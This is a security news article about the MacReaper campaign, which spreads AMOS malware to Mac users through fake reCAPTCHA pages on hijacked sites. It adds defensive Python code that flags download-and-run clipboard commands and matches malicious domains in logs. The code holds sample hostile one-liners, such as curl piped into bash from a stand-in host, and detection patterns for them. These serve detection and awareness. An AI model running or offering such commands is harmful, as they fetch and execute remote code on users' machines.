Friday, May 23, 2025
Over 2,800 Websites Hijacked to Spread AMOS Malware to Mac Users

This article covers:

  • 2,800 Trusted Sites Now Deliver Malware to Macs: Hackers hijacked real websites to silently redirect users into a malware trap disguised as a simple reCAPTCHA.
  • One Click Gives Hackers Full Access: A fake CAPTCHA tricks users into pasting a hidden command that installs AMOS malware—stealing passwords, documents, and crypto.
  • Mac Users Are the Only Target: This attack activates only on macOS, slipping past antivirus tools by using visual tricks and user action instead of obvious threats.
  • Hackers Are Selling AMOS on Telegram: Cybercriminals rent this powerful spyware for up to $3,000 a month, fueling a growing campaign to hijack Apple devices.

AMOS Malware Campaign Targets Mac Users Through Fake reCAPTCHA

Cybercriminals are shifting tactics. Email attachments and fake invoices are losing their edge, as users grow smarter and email systems get better at blocking threats. Now, hackers are exploiting something users often trust: Google’s reCAPTCHA.

A new campaign named MacReaper is using over 2,800 legitimate websites to spread Atomic macOS Stealer (AMOS) malware. This attack uses a fake Google reCAPTCHA to trick Mac users into copying and pasting malicious commands. Once run, the command installs AMOS, a powerful piece of malware designed to steal sensitive data from macOS systems.

The attack only triggers on Apple devices. If the site detects that the visitor is on Windows or Linux, it shows its normal content. The campaign’s goal is clear: trick Mac users with a simple action that leads to a full system compromise.

How MacReaper Delivers AMOS to Apple Devices

The process begins when a Mac user lands on one of the compromised websites. Instead of the expected content, the site displays a full-screen replica of Google’s reCAPTCHA. It prompts the user to click a checkbox labeled “I’m not a robot.”

Once the user clicks, a hidden command is silently copied to the clipboard. The site then shows another screen, styled like macOS system dialogs, telling the user to open the Terminal and paste the copied content.

If the user follows this prompt, they unknowingly download and run the AMOS malware.

This method, nicknamed ClickFix by researchers, relies on user trust and habit. The malware’s delivery process blends visual trickery with subtle instructions, making it highly effective. It doesn’t exploit a system vulnerability—it exploits user behavior.

AMOS is no small threat. It’s sold on Telegram for up to $3,000 per month. Once installed, it can:

  • Steal saved Wi-Fi and app passwords from Keychain.
  • Grab cookies and autofill data from browsers.
  • Scan files in the user’s Desktop and Documents folders.
  • Target over 50 types of cryptocurrency wallets.

Because users themselves activate the malware, security tools often fail to flag it. The infection looks like regular user activity.
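
One way to catch this before it runs is to inspect the copied text for download-and-run shapes. The following Python check is an added example, not code from the article or from any security product; the article does not show the copied command, so the patterns it looks for and the sample commands are assumptions.

```python
import os
import re

# Assumed heuristics: the article only says the pasted command downloads and
# runs AMOS, so these rules flag generic download-and-run command shapes.
FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
PIPE = re.compile(r"(?<!\|)\|(?!\|)")   # a single "|", not "||"
LIST_OP = re.compile(r"&&|\|\||;")      # separators between commands
SUBST_EXEC = re.compile(
    r"(?:^|[\s/])(?:sh|bash|zsh|eval)\s[^|;&]*(?:\$\(|`)\s*(?:curl|wget)\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# Constructed samples (example.invalid never resolves); the last two are benign.
SAMPLES = [
    "curl -fsSL https://example.invalid/a.sh | bash",
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/a.sh)"',
    "curl -s https://example.invalid/api | jq .",
    "ps aux | grep bash",
]

def _names(fragment):
    """Basenames of the words in a shell fragment, quoting stripped."""
    names = [os.path.basename(w.strip("\"'`()$")) for w in fragment.split()]
    return [n for n in names if n and n != "sudo"]

def classify_paste(text):
    """Return the reasons a pasted command looks like download-and-run."""
    reasons = []
    stages = PIPE.split(text)
    for left, right in zip(stages, stages[1:]):
        producer = LIST_OP.split(left)[-1]          # command feeding the pipe
        consumer = _names(LIST_OP.split(right)[0])[:1]  # command reading it
        if not consumer or consumer[0] not in INTERPRETERS:
            continue
        if FETCHERS & set(_names(producer)):
            reasons.append("download piped into an interpreter")
        elif B64_DECODE.search(producer):
            reasons.append("decoded blob piped into an interpreter")
    if SUBST_EXEC.search(text):
        reasons.append("interpreter runs the output of a download")
    return reasons

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify_paste(sample) or "no download-and-run shape", "<-", sample)
```

To vet a real paste on macOS, pass the output of `pbpaste` to `classify_paste` before anything reaches Terminal. An empty result only means none of these assumed shapes matched.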

Domains Used to Spread AMOS Malware

Security researchers have traced the MacReaper campaign to several known domains. These include:

  • technavix.cloud
  • salorttactical.top
  • agencia2.jornalfloripa.com.br (a Brazilian news site initially used to launch the operation)

From this starting point, the malware campaign quickly scaled to affect over 2,800 legitimate websites across multiple regions. The hackers repurposed trusted sites to redirect users into their trap.

This wide-scale abuse of legitimate web domains makes the campaign harder to detect and block. It also increases the odds of users stumbling across an infected site during normal browsing.
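
For defenders who keep proxy or DNS logs, the three domains above can be hunted directly. The following Python example is added here and is not from the article or the researchers; the log layout and every log line are constructed, and only the domain names come from the list above. It matches on whole DNS labels so that lookalike names are not flagged.

```python
from urllib.parse import urlsplit

# Domains copied from the article's list above.
IOC_DOMAINS = {
    "technavix.cloud",
    "salorttactical.top",
    "agencia2.jornalfloripa.com.br",
}

# Constructed sample; the "<time> <client> <url-or-host>" layout is an assumption.
SAMPLE_LOG = [
    "2025-05-20T10:01:02Z 10.0.0.5 https://cdn.technavix.cloud/a.js",
    "2025-05-20T10:01:03Z 10.0.0.6 https://nottechnavix.cloud/",
    "2025-05-20T10:01:04Z 10.0.0.7 https://technavix.cloud.example.com/",
    "2025-05-20T10:01:05Z 10.0.0.8 http://SALORTTACTICAL.TOP./x",
    "2025-05-20T10:01:06Z 10.0.0.9 agencia2.jornalfloripa.com.br:443",
    "2025-05-20T10:01:07Z 10.0.0.9 https://jornalfloripa.com.br/",
]

def host_of(target):
    """Lowercase hostname from a URL or a bare host[:port]."""
    if "://" not in target:
        target = "//" + target  # make urlsplit parse a bare host as netloc
    return (urlsplit(target).hostname or "").rstrip(".")

def matched_ioc(host):
    """Compare whole DNS labels so lookalike names do not match."""
    labels = host.split(".")
    for i in range(len(labels)):
        suffix = ".".join(labels[i:])
        if suffix in IOC_DOMAINS:
            return suffix
    return None

def hunt(lines):
    """Return (client, target, ioc) for every line that hits an IoC domain."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # skip malformed lines instead of raising
        if (ioc := matched_ioc(host_of(fields[2]))):
            hits.append((fields[1], fields[2], ioc))
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

A hit on agencia2.jornalfloripa.com.br shows a visit to a hijacked legitimate site, so treat it as a lead to triage rather than proof of infection.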

How to Protect Yourself from AMOS and Fake reCAPTCHA Attacks

The MacReaper attack is a clear reminder that no system is safe from malware. Mac users must treat social engineering threats as seriously as traditional exploits. Here are six key steps to stay protected:

1. Ignore CAPTCHA Requests That Involve Terminal Use

Legitimate CAPTCHA systems never ask you to copy and paste commands. If a website tells you to open Terminal and run something, close the page immediately. It’s almost certainly a scam.

2. Avoid Clicking Suspicious Links and Use Antivirus Protection

Many infections start with phishing emails pretending to be from real companies. Don’t click links in emails you weren’t expecting. Visit websites directly by typing the URL yourself.

Install antivirus software on all devices. Good antivirus tools can block malware, flag phishing sites, and scan downloads before they run. Strong protection on both Windows and Mac is no longer optional.

3. Enable Two-Factor Authentication

Use two-factor authentication (2FA) for all accounts. This adds another step for attackers trying to break into your services, even if they steal your password.

4. Keep All Devices and Software Updated

Always update your operating system, browsers, and antivirus tools. Turn on automatic updates where possible. Many attacks exploit outdated software with known flaws.

5. Watch for Unusual Account Activity

If you suspect you’ve clicked on a bad link or visited a fake site, check your online accounts for strange behavior. Look for:

  • New logins from unknown locations.
  • Password reset requests.
  • Unexplained financial activity.

If anything looks off, change your passwords immediately. A password manager can help you generate and store strong, unique passwords.

6. Use Personal Data Removal Services

Some services monitor your personal data and alert you if it appears in leaks or public databases. These tools help track if your identity is being misused after a malware infection. While they can’t delete all your data, they help reduce exposure by automating takedown requests across multiple platforms.

MacReaper Proves macOS Is Not Immune to Malware

The MacReaper campaign reveals a growing issue: many users believe Macs are immune to cyberattacks. This belief is false. macOS offers some built-in protections, but it does not stop all threats, especially threats that rely on social engineering instead of system exploits.

Hackers are now using design tricks and human psychology. A user who clicks a checkbox and follows instructions is unknowingly giving malware permission to run.

AMOS uses this method to steal browser data, documents, and even cryptocurrency. Since Macs often share identity systems with Windows devices on enterprise networks, a single infected Mac can lead to wider breaches across cloud storage, single sign-on portals, and internal company tools.

Final Thoughts: Trust Is the Weak Point

The AMOS malware campaign shows that the biggest weakness is trust. A fake reCAPTCHA, a familiar macOS prompt, and a helpful-looking instruction can trick even cautious users.

Apple continues to roll out technical protections like Rapid Security Response and app notarization. But users must also build healthy habits: pause before clicking, question unexpected prompts, and treat every web interaction with caution.

Security is now a shared responsibility. Whether you’re using Windows or macOS, antivirus tools, strong passwords, updates, and skepticism are your best defense.

Do you think companies are doing enough to stop malware like AMOS? Let us know.

Wasiq Tariq